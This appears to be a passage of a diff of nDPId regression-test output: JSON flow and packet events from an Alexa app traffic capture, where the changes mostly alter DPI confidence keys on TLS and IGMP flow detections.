+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047858,"flow_last_seen":1490976047858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047858,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1490976047858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047858,"pkt":"AMDKkaPvePiC0\/vCCABFAAA84nJAAEAGasSsECrYSBXOh6SgAbtFc7NzAAAAAKAC\/\/9pQAAAAgQFtAQCCAoA9lEBAAAAAAEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1490976047907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047907,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwsPFAAOcG9VBIFc6HrBAq2AG7pKCmhnFJRXOzdHASH\/6\/cgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00190{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976048620} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976048429,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1490976054071,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976054071,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoL1NAAEAGF7CsECrYNF7ohrJ3AbtDNXw2OlR3KlAQAVeVkwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1490976055356,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976055356,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} -00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976057977,"flow_last_seen":1490976057977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976057977,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1490976057977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976057977,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8quhAAEAGnAasECrYNF7ohrJ4AbvwDv4cAAAAAKAC\/\/9b6AAAAgQFtAQCCAoA9lT0AAAAAAEDAwg="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1490976058029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058029,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9qRAAOcGqVU0XuiGrBAq2AG7snh1d2z38A7+HXASH\/7rbgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1490976058030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058030,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqulAAEAGnBmsECrYNF7ohrJ4AbvwDv4ddXds+FAQAVc14AAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976058103,"flow_last_seen":1490976058103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976058103,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1490976058103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976058103,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87D9AAEAGJ+usECrYNu8YuoT5Abs\/ELk9AAAAAKAC\/\/9McwAAAgQFtAQCCAoA9lUCAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1490976058160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5wBAAOcGhjU27xi6rBAq2AG7hPl2s2uGPxC5PnASH\/7cPAAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1490976058162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058162,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7EBAAEAGJ\/6sECrYNu8YuoT5Abs\/ELk+drNrh1AQAVcmrgAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 